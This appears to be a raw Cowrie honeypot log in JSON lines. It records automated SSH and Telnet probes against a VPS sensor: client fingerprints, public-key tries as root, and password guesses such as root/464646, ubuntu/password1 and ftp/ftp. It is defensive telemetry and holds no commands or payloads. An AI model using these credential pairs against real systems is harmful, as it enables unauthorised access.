{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.204413Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.407786Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.408399Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.610651Z","src_ip":"212.227.235.229","session":"8be2f78e9e24"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51808,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdefc6b195c1","protocol":"ssh","message":"New connection: 212.227.235.229:51808 (1.2.3.4:22) [session: cdefc6b195c1]","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.816476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-26T12:19:42.817531Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T12:19:43.024005Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-26T12:19:43.439639Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:43.440897Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","sensor":"my-vps","timestamp":"2025-08-26T12:19:43.648939Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:43.649914Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:43.858753Z","src_ip":"212.227.235.229","session":"cdefc6b195c1"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":50094,"dst_ip":"1.2.3.4","dst_port":22,"session":"169d9c1ba132","protocol":"ssh","message":"New connection: 83.168.105.65:50094 (1.2.3.4:22) [session: 169d9c1ba132]","sensor":"my-vps","timestamp":"2025-08-26T12:19:46.093753Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:46.094846Z","src_ip":"83.168.105.65","session":"169d9c1ba132"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:19:46.135152Z","src_ip":"83.168.105.65","session":"169d9c1ba132"}
{"eventid":"cowrie.login.success","username":"root","password":"464646","message":"login attempt [root/464646] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:19:46.168077Z","src_ip":"212.227.235.229","session":"45b504bc97e5"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"123456","message":"login attempt [elasticsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:46.258572Z","src_ip":"83.168.105.65","session":"169d9c1ba132"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:46.929905Z","src_ip":"212.227.235.229","session":"45b504bc97e5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:47.303141Z","src_ip":"83.168.105.65","session":"169d9c1ba132"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56324,"dst_ip":"1.2.3.4","dst_port":22,"session":"826cd940f554","protocol":"ssh","message":"New connection: 212.227.235.229:56324 (1.2.3.4:22) [session: 826cd940f554]","sensor":"my-vps","timestamp":"2025-08-26T12:19:47.514183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:19:47.826241Z","src_ip":"212.227.235.229","session":"826cd940f554"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:19:47.826968Z","src_ip":"212.227.235.229","session":"826cd940f554"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"password1","message":"login attempt [ubuntu/password1] failed","sensor":"my-vps","timestamp":"2025-08-26T12:19:49.504350Z","src_ip":"212.227.235.229","session":"826cd940f554"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:19:50.819956Z","src_ip":"212.227.235.229","session":"826cd940f554"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":48242,"dst_ip":"1.2.3.4","dst_port":22,"session":"5385c43ea2dc","protocol":"ssh","message":"New connection: 83.168.105.65:48242 (1.2.3.4:22) [session: 5385c43ea2dc]","sensor":"my-vps","timestamp":"2025-08-26T12:20:01.989538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:20:01.990643Z","src_ip":"83.168.105.65","session":"5385c43ea2dc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:20:02.031233Z","src_ip":"83.168.105.65","session":"5385c43ea2dc"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-26T12:20:02.153357Z","src_ip":"83.168.105.65","session":"5385c43ea2dc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:20:03.195846Z","src_ip":"83.168.105.65","session":"5385c43ea2dc"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":51676,"dst_ip":"1.2.3.4","dst_port":22,"session":"644175f50d4b","protocol":"ssh","message":"New connection: 83.168.105.65:51676 (1.2.3.4:22) [session: 644175f50d4b]","sensor":"my-vps","timestamp":"2025-08-26T12:20:17.485036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:20:17.486313Z","src_ip":"83.168.105.65","session":"644175f50d4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:20:17.522286Z","src_ip":"83.168.105.65","session":"644175f50d4b"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"123456","message":"login attempt [uftp/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:20:17.633141Z","src_ip":"83.168.105.65","session":"644175f50d4b"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:20:18.671123Z","src_ip":"83.168.105.65","session":"644175f50d4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34019,"dst_ip":"1.2.3.4","dst_port":23,"session":"d68ab5eacd22","protocol":"telnet","message":"New connection: 212.227.235.229:34019 (1.2.3.4:23) [session: d68ab5eacd22]","sensor":"my-vps","timestamp":"2025-08-26T12:20:26.249473Z"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35838,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d778cd99822","protocol":"ssh","message":"New connection: 83.168.105.65:35838 (1.2.3.4:22) [session: 6d778cd99822]","sensor":"my-vps","timestamp":"2025-08-26T12:20:32.961256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:20:32.962027Z","src_ip":"83.168.105.65","session":"6d778cd99822"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:20:32.999534Z","src_ip":"83.168.105.65","session":"6d778cd99822"}
{"eventid":"cowrie.login.failed","username":"awsgui","password":"awsgui","message":"login attempt [awsgui/awsgui] failed","sensor":"my-vps","timestamp":"2025-08-26T12:20:33.113327Z","src_ip":"83.168.105.65","session":"6d778cd99822"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:20:34.152512Z","src_ip":"83.168.105.65","session":"6d778cd99822"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":3004,"dst_ip":"1.2.3.4","dst_port":22,"session":"a83cc0b86d38","protocol":"ssh","message":"New connection: 213.209.150.239:3004 (1.2.3.4:22) [session: a83cc0b86d38]","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.118093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:20:43.128842Z","src_ip":"213.209.150.239","session":"a83cc0b86d38"}
